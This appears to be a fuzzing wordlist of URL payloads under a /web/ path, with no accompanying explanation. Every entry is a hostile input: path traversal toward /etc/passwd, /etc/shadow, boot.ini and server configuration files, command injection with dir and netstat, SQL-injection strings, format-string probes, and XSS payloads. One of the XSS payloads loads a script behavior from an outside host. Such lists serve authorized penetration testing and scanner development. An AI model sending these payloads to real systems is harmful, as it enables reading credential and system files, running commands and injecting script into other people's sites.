/web/-1.0/,/web/2147483647/,/web/%00/,/web/\0/,/web/\nnetstat%20-a%\n/
/web/-2/,/web/0/,/web/+%00/,/web/\0\0/,/web/`dir`/,/web/id%00/,/web/;dir/,/web/ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|/
/web//../../../../../../../../%2A/
/web/../../../../../../../../../../../../etc/passwd/
/web/../../boot.ini/
/web/../../../../../../../../../../../../etc/passwd%00/,/web/../../../../../../../../../../../../etc/hosts/
/web/-1/,/web/null/,/web/\0\0\0/,/web/|dir/,/web/?x="/,/web//../../../../../../../../../../etc/passwd/
/web/..\..\..\..\..\..\..\..\..\..\etc\shadow/,/web/../../../../../../../../conf/server.xml/
/web//%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00/,/web//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd/
/web//./././././././././././etc/passwd/,/web//../../../../../../../../../../../etc/passwd%00.jpg/,/web//..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd/,/web/../../../../../../../../../../../../localstart.asp/
/web/../../../../../../../../../../../../boot.ini/
/web/C:\inetpub\wwwroot\global.asa/,/web/C:\boot.ini/,/web/%/
/web//,%ENV,//
/web//../../../../../../../../../../../boot.ini%00/,/web//../../../../../../../../../../../boot.ini%00.jpg/,/web//../../../../../../../../../../../boot.ini%00.html/,/web//.../.../.../.../...//,/web//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini/
/web/../../../../../../../../../../../../localstart.asp%00/,/web/../../../../../../../../../../../../boot.ini%00/,/web/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini/,/web/;/,/web/`/,/web/\'/,/web/,/web/{'}/,/web/%2e%2e%2f/,/web/..%%35c/
/web/!@,/web/\\\\?\\/,/web/&LT/,/web/(')/,/web/&,/web/..%5c/,/web/..%%35%63/
/web/..%u2216/
/web/'%20or%20'x'='x/,/web/or%200=0%20,/web/hi'%20or%20'a'='a/,/web/@variable/,/web/desc/,/web/handler/,/web/tz_offset/,/web/(sqlattempt2)/,/web/count(/child::node())/,/web/%26/,/web/<xml%20SRC="xsstest.xml"%20ID=I></xml><SPAN%20DATASRC=
/web/1;SELECT%20*/,/web/%7C/,/web/*/*/,/web/&/,/web/<xml%20ID="xss"><I><B>&lt;IMG%20SRC="javas<!--%20-->cript:alert('XSS')"&gt;</B></I></xml><SPAN%20DATASRC=",/web/<HTML%20xmlns:xss><?import%20namespace="xss"%20implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>/
